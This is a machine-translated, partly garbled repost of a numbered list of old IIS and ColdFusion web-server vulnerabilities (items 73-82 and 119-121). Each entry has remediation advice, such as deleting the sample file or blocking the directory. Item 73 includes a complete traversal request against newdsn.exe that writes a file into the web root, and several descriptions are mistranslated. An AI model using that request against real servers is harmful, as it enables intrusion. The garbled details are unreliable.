73 Type: Attack Name: NewDSN.EXE Risk Level: This Description: This newdsn.exe file in / scripts / tools directory allows any user to create any files in the web root, such as http: // xxx .XXX.XXX.XXX / SCRIPTS / TOOLS / NEWDSN.EXE? Driver = Microsoft% 2Baccess% 2BDriver% 2B% 28 * .mdb% 29 & DSN = Evil2 Samples from Microsoft & DBQ = ..% 2F ..% 2Fwwwroot% 2FEvil2 .htm & newdb = CREATE_DB & attr = suggestion: Disable anonymous access to the / scripts / tools directory Workaround: delete the file _______________________________________________________________________________ newdsn.exe

75 Type: Information Model: Showcode.asp_3 Risk Level: In / iissamples / ExAir / HowitWorks / Exist Code.asp file, intruder uses this file to view any ASCII file on the server hard disk, and display ASP Source code for program files: Disable anonymous access solution for Web Directory for / iissamples: Delete showcode.asp files

________________________________________________________________________________________________________________________________________________________________________________________________________________________________

76 Type: Attack Name: AEXP.HTR Risk Level: Aexp.htr file in / iisadmpwd directory, similar to Aexp2.htr, aexp3.htr, Aexp4b.htr, etc. These files allow attackers to use Evue method, etc. Crack and modify the password of the NT user. Recommendation: It is recommended to prohibit access to / iisadmpwd directory: delete aexp.htr file

_________________________________________________________________

77 Type: Attack Name: Aexp2.htr Risk Level: Aexp2.htr file in / iisadmpwd directory, similar to aexp2.htr, aexp3.htr, and aexp4b.htr, etc., these files allow attackers to use Evue method, etc. Crack and modify the password of the NT user. Recommendation: It is recommended to prohibit access to / iisadmpwd directory: delete aexp2.htr file

__________________________________________________________________

78 Type: Attack Name: aexp3.htr Risk Level: Aexp3.htr file in / iisadmpwd directory, similar to aexp2.htr, aexp3.htr, Aexp4b.htr, etc., these files allow attackers to use Evue method, etc. Crack and modify the password of the NT user. Recommendation: It is recommended to prohibit access to / iisadmpwd directory: delete aexp3.htr file

____________________________________________________________________

79 Type: Attack Name: Aexp4b.htr Risk Level: Aexp4b.htr file in / iisadmpwd directory, similar to Aexp2.htr, aexp3.htr, Aexp4b.htr, etc., these files allow attackers to use Evue method, etc. Crack and modify the password of the NT user. Recommendation: disable access to the / iisadmpwd directory Workaround: Delete the file ____________________________________________________________________________________ aexp4b.htr

80 Type: Attack Name: Achg.htr Risk Level: Aechg.htr file in / iisadmpwd directory, similar Aexp2.htr, aexp3.htr, Aexp4b.htr, etc., these files allow attackers to use Evue method, etc. Crack and modify the password of the NT user. Recommendation: It is recommended to prohibit access to / iisadmpwd directory: delete achg.htr files

_________________________________________________________________

81 Type: Attack Name: Exprcale.cfm Risk Level: Description: On ColdFusion Web Directory: /cfdocs/expeval/exprcalc.cfm file, this file has a vulnerability allows users to read server hard drives include user passwords Database SAM file suggestion: Delete related file workaround: Delete an exprcalc.cfm file

__________________________________________________________________

82 Type: Attack Name: GetFile.cfm Risk Level: In ColdFusion's Web Directory: /getfile.cfm file, this file has a vulnerability allows the user to read the server's hard disk includes user password database SAM file recommendations : Delete related file workarounds: Delete getFile.cfm files

____________________________________________________________

119 Type: Information type: X.htw Risk Level: In the description: IIS4.0 has an application map HTW ---> WebHits.dll, which is the click function of Index Server. Although you don't run Index Server, the mapping is still valid. This application map has a vulnerability, allowing intruders to read files, database files, and ASP source code on the local hard disk. Recommendation: It is recommended to remove useless applications mapping in the IIS console.

__________________________________________________________________________________________________________________

120 Type: Information type: Qfullhit.htw Risk Level: IIS4.0 There is an application mapping HTW ---> WebHits.dll on IIS4.0, which is the click function of INDEX Server. Although you don't run Index Server, the mapping is still valid. This application map has a vulnerability, allowing intruders to read files, database files, and ASP source code on the local hard disk. Recommendation: It is recommended to remove useless applications mapping in the IIS console _____________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________

121 Type: Information type: IIRTURNH.HTW Risk Level: In IIS4.0 There is an application mapping HTW ---> WebHits.dll on IIS4.0, which is the click function of INDEX Server. Although you don't run Index Server, the mapping is still valid. This application map has a vulnerability, allowing intruders to read files, database files, and ASP source code on the local hard disk. Recommendation: It is recommended to remove useless applications mapping in the IIS console.

I believe that friends who seriously see that at the serial number 82, miss dozens of information .. That is no way, not my problem, I got this information like this ... I don't know because it Dozens of vulnerabilities are more destructive. . Please have someone else :)

转载请注明原文地址:https://www.9cbs.com/read-3001.html

New Post(0)